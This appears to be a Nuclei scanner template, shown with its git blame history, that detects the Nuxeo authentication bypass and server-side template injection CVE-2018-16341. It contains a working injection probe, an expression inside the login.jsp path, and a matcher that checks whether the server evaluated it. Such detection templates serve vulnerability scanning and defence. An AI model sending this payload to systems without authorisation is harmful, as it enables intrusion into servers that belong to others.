nuclei-templates/cves/2018/CVE-2018-16341.yaml

id: cve-2018-16341

info:
  name: Nuxeo Authentication Bypass Remote Code Execution
  author: madrobot
  severity: high
  description: Nuxeo Authentication Bypass Remote Code Execution &lt; 103 using a SSTI
requests:
  - method: GET
    path:
      - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
    matchers:
      - type: word
        words:
          - "31333333337"
        part: body
Normalized id fields to match schema regex 2020-09-15 19:25:55 +00:00			`id: cve-2018-16341`
Pushing newly added cves 2020-06-22 13:35:37 +00:00
			`info:`
			`name: Nuxeo Authentication Bypass Remote Code Execution`
			`author: madrobot`
			`severity: high`
fix minor issue fix issue from yamllint. 2020-08-27 16:19:24 +00:00			`description: Nuxeo Authentication Bypass Remote Code Execution < 103 using a SSTI`
Pushing newly added cves 2020-06-22 13:35:37 +00:00			`requests:`
			`- method: GET`
			`path:`
:wrench: Fix for false-positive CVE-2018-16341 results 2020-07-02 10:45:29 +00:00			`- "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"`
Pushing newly added cves 2020-06-22 13:35:37 +00:00			`matchers:`
			`- type: word`
			`words:`
:wrench: Fix for false-positive CVE-2018-16341 results 2020-07-02 10:45:29 +00:00			`- "31333333337"`
Pushing newly added cves 2020-06-22 13:35:37 +00:00			`part: body`